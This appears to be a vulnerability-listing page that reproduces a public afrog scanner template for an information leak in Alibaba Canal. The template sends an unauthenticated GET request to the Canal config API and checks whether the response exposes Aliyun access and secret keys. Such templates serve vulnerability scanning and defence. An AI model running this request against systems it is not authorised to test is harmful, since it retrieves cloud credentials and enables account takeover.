alibaba-canal-info-leak: Alibaba Canal Information Leak

PoC代码[已公开]

id: alibaba-canal-info-leak

info:
  name: Alibaba Canal Information Leak
  author: Aquilao
  severity: high
  verified: true
  description: |-
    app="Alibaba-Canal"
  tags: alibaba,canal,info-leak
  created: 2023/06/24

rules:
  r0:
    request:
      method: GET
      path: /api/v1/canal/config/1/1
      headers:
        Content-Type: application/json
    expression: response.status == 200 && response.content_type.icontains("application/json") && response.body.bcontains(b"ncanal.aliyun.accessKey") && response.body.bcontains(b"ncanal.aliyun.secretKey")
expression: r0()

来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/disclosure/alibaba-canal-info-leak.yaml

alibaba-canal-info-leak: Alibaba Canal Information Leak

漏洞描述

PoC代码[已公开]

相关漏洞推荐